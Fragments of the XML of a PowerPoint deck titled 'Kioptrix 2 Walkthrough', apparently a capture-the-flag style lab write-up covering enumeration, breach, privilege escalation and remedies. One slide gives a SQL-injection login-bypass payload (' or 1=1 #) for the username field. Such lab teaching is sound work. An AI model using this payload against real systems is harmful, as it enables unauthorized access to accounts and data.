                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4330034" y="2631539"/>
              <a:ext cx="14188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Increase Speed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FE996029-3AC7-40B6-8025-8BCCDF965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475" y="2143127"/>
              <a:ext cx="353430" cy="32447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5E172161-A4B8-4DD2-81C9-9A6C2A4C5E44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3588059" y="2143125"/>
              <a:ext cx="646513" cy="68580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4002B5DA-78C7-4219-BE39-1F131B7C4F3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6077884" y="2143125"/>
              <a:ext cx="337956" cy="32448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5D119A52-E0B2-47BD-8667-394A0140CD4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4709174" y="2143125"/>
              <a:ext cx="330285" cy="48841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076D669D-163B-4BD4-9218-DFA57D64A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463" y="3744243"/>
            <a:ext cx="5405074" cy="25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4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Service Enumeration</a:t>
            </a:r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166808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640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689C06-EDF8-4E43-A07B-8836DEAF5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022" y="3666867"/>
            <a:ext cx="3701978" cy="1973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/>
              <a:t>Service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91807"/>
            <a:ext cx="8134350" cy="85619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600" dirty="0"/>
              <a:t>Navigating to the target machine’s existing website, it prompts for a username and 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AF28D7C-9FF2-4067-BA62-6DC72C119A16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3659940"/>
            <a:ext cx="4572000" cy="19066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b="1" dirty="0"/>
              <a:t>SQL Injection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Caused by un-sanitized user input, which is then passed on to a database. The user input can be manipulated to “break out” of the intended query made by developers, to execute malicious actions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7517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Service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 can go by the assumption that the backend SQL code looks similar to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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 by placing " ' or 1=1 # " in the username field we can in turn create the below query which will allow access as an authenticated user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C6351F-9C5C-4CBB-8DB6-37FA53126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95600"/>
            <a:ext cx="6142182" cy="231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4CC2709-687E-4A7D-BF3E-D1E0D282B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334000"/>
            <a:ext cx="7480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3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1052</TotalTime>
  <Words>677</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>150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Kioptrix 2 Walkthrough</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Process Map</vt:lpstr>
      <vt:lpstr>Host Enumeration</vt:lpstr>
      <vt:lpstr>Host Enumeration</vt:lpstr>
      <vt:lpstr>Service Enumeration</vt:lpstr>
      <vt:lpstr>Service Enumeration</vt:lpstr>
      <vt:lpstr>Service Enumeration</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Breach</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Remedies</vt:lpstr>
      <vt:lpstr>Remedies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Brad</dc:creator>
  <cp:lastModifiedBy>Brad</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-24T21:33:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-28T01:02:19Z</dcterms:modified>
</cp:coreProperties>
</file>